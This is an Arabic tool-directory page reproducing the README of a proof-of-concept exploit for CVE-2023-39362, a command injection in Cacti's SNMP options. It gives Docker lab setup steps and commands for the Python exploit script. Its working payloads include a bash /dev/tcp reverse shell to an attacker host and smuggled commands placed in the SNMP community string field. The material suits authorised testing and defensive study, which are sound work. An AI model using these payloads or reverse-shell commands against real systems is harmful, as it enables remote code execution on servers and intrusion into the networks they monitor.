Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — استغلال إثبات المفهوم لـ CVE-2023-39362، حقن أوامر موثق في خيارات SNMP في Cacti. يتضمن بيئة Docker ضعيفة للاختبار ونص برمجي بلغة Python للاستغلال الآلي مع إمكانية الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرمختبرات وتدريب عملي
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-39362-cacti-snmp-command-injection-poc

استغلال إثبات المفهوم لـ CVE-2023-39362، حقن أوامر موثق في خيارات SNMP في Cacti. يتضمن بيئة Docker ضعيفة للاختبار ونص برمجي بلغة Python للاستغلال الآلي مع إمكانية الصدفة العكسية.

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

ثغرة حقن الأوامر في Cacti (CVE-2023-39362) - إثبات المفهوم

تم تفرع هذا المستودع من هذا المستودع: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti هو إطار عمل مفتوح المصدر لمراقبة التشغيل وإدارة الأعطال، يتطور باستمرار لتلبية الاحتياجات الديناميكية لمجتمع مستخدميه.

في الإصدار 1.2.24، تم تحديد ثغرة أمنية محتملة تحمل العلامة CVE-2023-39362. في ظل ظروف معينة، يمكن لمستخدم مصرح له بصلاحيات استغلال خلل في خيارات SNMP لـ جهاز، باستخدام سلسلة ضارة تؤدي إلى حقن الأوامر. يؤدي هذا الاستغلال إلى تنفيذ رمز عن بعد بشكل مصرح به على الخادم الأساسي.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

آثار هذه الثغرة خطيرة، حيث يمكن لمهاجم ذي صلاحيات مصرح بها المساس بسلامة الخادم الذي يستضيف Cacti. قد يكون هذا الاختراق بمثابة بوابة للوصول غير المصرح به إلى المضيفين الآخرين داخل الشبكة، خاصة تلك التي يراقبها Cacti.

هذا تطبيق ضعيف لاختبار استغلال ثغرة Cacti (CVE-2023-39362).

تحذير!

يحتوي هذا التطبيق على ثغرات أمنية خطيرة. قم بتشغيله على مسؤوليتك الخاصة! يُوصى باستخدام بيئة مدعومة ومحمية (مثل جهاز افتراضي بنسخة احتياطية حديثة وشبكة مضيفة فقط). لا تقم بتحميل هذا التطبيق على أي خوادم مواجهة للإنترنت، حيث سيتم اختراقها.

إخلاء مسؤولية

أنا لا أتحمل مسؤولية الطريقة التي يستخدم بها أي شخص هذا التطبيق. الغرض الوحيد من هذا التطبيق هو أن يكون سيناريو اختبار لاستغلال CVE-2023-39362 ولا ينبغي استخدامه بشكل ضار. إذا تم اختراق خادمك من خلال تثبيت هذا التطبيق، فهذه ليست مسؤوليتي، بل مسؤولية الشخص (الأشخاص) الذين قاموا بتحميله وتثبيته.**

الاستخدام

1. إعداد البيئة

فيما يلي خطوات إعداد البيئة:

  1. قم بتشغيل docker compose up -d لبدء التشكيل.
  2. يمكنك إنهاء الخطوات بالتصفح إلى http://127.0.0.1/cacti لبدء معالج تهيئة Cacti. إذا تلقيت خطأ يشير إلى قاعدة البيانات، انتظر قليلاً وقم بتحديث الصفحة.
  3. بيانات الاعتماد الافتراضية هي admin/admin.
  4. اضغط على 'التالي' لجميع الأزرار أثناء المعالج، مع اختيار الخيارات وفقًا لذلك. يجب أن تكون جميع الإعدادات الافتراضية جيدة ويجب استيفاء جميع المتطلبات الأساسية الإلزامية.
  5. بعد التثبيت، قم بتسجيل الدخول كـ admin.
  6. انتقل إلى 'وحدة التحكم' > 'الإعدادات' > 'المستخدم'.
  7. انقر على المستخدم guest.
  8. 'قم بتمكينه'، وحدد كلمة مرور، وقم بتعطيل 'يجب تغيير كلمة المرور عند تسجيل الدخول التالي' إذا أردت.
  9. انقر على زر 'حفظ'.
  10. انتقل إلى قسم 'الأذونات'.
  11. ضمن 'الإدارة العامة'، قم بتمكين 'الوصول إلى وحدة التحكم' و 'المواقع/الأجهزة/البيانات'.
  12. انقر على زر 'حفظ'.
  13. قم بتسجيل الخروج وأعد تسجيل الدخول كـ guest لتجربة الاستغلال.

يمكن العثور على دليل التثبيت الرسمي لـ Cacti هنا.

لـ تفكيك البيئة استخدم الأمر docker compose down.

2. تشغيل سكريبت الاستغلال

(هذا مجرد مسار واحد محتمل للاستغلال)

تشغيل الأمر على الخادم البعيد:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

فتح شل عكسي:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. الاستغلال اليدوي

  1. انتقل إلى 'وحدة التحكم' > 'إنشاء' > 'جهاز جديد'.
  2. قم بإنشاء جهاز يدعم SNMP الإصدار 1 أو 2.
  3. تأكد من أن الجهاز يحتوي على رسوم بيانية مع قالب أو أكثر من:
    • 'Net-SNMP - Combined SCSI Disk Bytes'
    • 'Net-SNMP - Combined SCSI Disk I/O'
    • (إنشاء الجهاز من القالب 'Net-SNMP Device' سيلبي متطلبات الرسوم البيانية)
  4. في 'خيارات SNMP'، لحقل 'سلسلة مجتمع SNMP'، استخدم قيمة مثل هذه: public\' ; touch /tmp/proof ; \'.
  5. انقر على زر 'إنشاء'.
  6. تحقق تحت /tmp من وجود الملف الذي تم إنشاؤه.

للحصول على شل عكسي، يمكن استخدام حمولة مثل التالية.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

السبب الجذري

يمكن العثور على سبب جذري مفصل للثغرة في الإشعار الأمني الأصلي أو على منشور المدونة للمؤلف الأصلي.

المؤلفون

  • أنطونيو فرانشيسكو سارديلا - مبلغ الثغرة - m3ssap0
  • أكوش جاكاب - أتمتة الاستغلال عبر سكريبت بايثون - jakabakos

الترخيص

هذا المشروع مرخص بموجب Unlicense - راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة